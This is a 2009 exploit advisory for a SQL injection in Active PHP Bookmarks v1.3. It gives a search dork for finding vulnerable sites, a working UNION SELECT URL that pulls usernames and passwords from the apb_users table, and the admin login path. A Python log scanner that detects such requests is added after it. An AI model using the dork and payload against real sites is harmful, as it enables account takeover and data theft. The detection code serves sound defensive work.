
Active PHP Bookmarks v1.3 SQL Injection Vulnerability

Tuesday, 22 December 2009
# Title: Active PHP Bookmarks v1.3 SQL Injection Vulnerability
# EDB-ID: 10597
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Mr.Elgaarh
# Published: 2009-12-22
# Verified: yes
    # Title: Active PHP Bookmarks v1.3 Remote SQL Injection Vulnerability
    # EDB-ID: ()
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Mr.Elgaarh
    # Published: 2009-12-21
    =============================================================
    ~ Author : Mr.Elgaarh
    ~ Email : scan_cmpu@yahoo.com
    ~ Home : http://securityreason.com/
    =============================================================

    Dork : "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id=

    ./Exploit:

    first search for the admin username :
    ex : http://server/path/view_group.php?id=-4

    ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--

    admin panel path : http://server/path/cookie_auth.php?action=cookie_login

    ---------------------------------------------------------------------------------------------------------------------------
    Greets : Mado - Dr.Hacker - Mr.Max - broken proxy - Offensive Security - AG-Spider - ISlamic Defenders Crew -
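
For detection, the requests shown above leave a clear trace in web server access logs: view_group.php normally receives a plain numeric id, while the advisory's requests carry a negative id and SQL keywords. The following is an added example, not part of the original advisory or of Active PHP Bookmarks; the function names, the /apb/ install path and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments seen in the advisory's request, plus SQL comment openers
SQL_MARKERS = re.compile(r"union\s+select|concat\s*\(|apb_users|--|/\*", re.I)

# Constructed sample lines (documentation IP ranges, assumed /apb/ install path)
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2009:10:01:02 +0000] "GET /apb/view_group.php?id=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [22/Dec/2009:10:02:11 +0000] "GET /apb/view_group.php?id=-4 HTTP/1.1" 200 2210',
    '198.51.100.7 - - [22/Dec/2009:10:02:15 +0000] "GET /apb/view_group.php?id=-4+union+select+0,1,'
    'concat(username,0x3a,password),3,4,5,6,7+from+apb_users-- HTTP/1.1" 200 2304',
    '192.0.2.10 - - [22/Dec/2009:10:03:00 +0000] "GET /apb/index.php HTTP/1.1" 200 900',
]

def classify(line):
    """Return a reason string if the line is a suspicious view_group.php hit, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    try:
        url = urlsplit(m.group(1))
    except ValueError:  # malformed request target
        return None
    if not url.path.lower().endswith("/view_group.php"):
        return None
    # parse_qs percent-decodes and maps '+' to space, as PHP does before the script sees id
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if SQL_MARKERS.search(value):
            return "sql-keywords-in-id"
        if not re.fullmatch(r"[0-9]+", value):
            return "non-numeric-id"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        reason = classify(line)
        if reason:
            hits.append((number, reason))
    return hits

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(number, reason)
```

Log matching only shows that the parameter was probed; the fix belongs in the application, where id should be cast to an integer or bound as a query parameter before it reaches the SQL statement.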



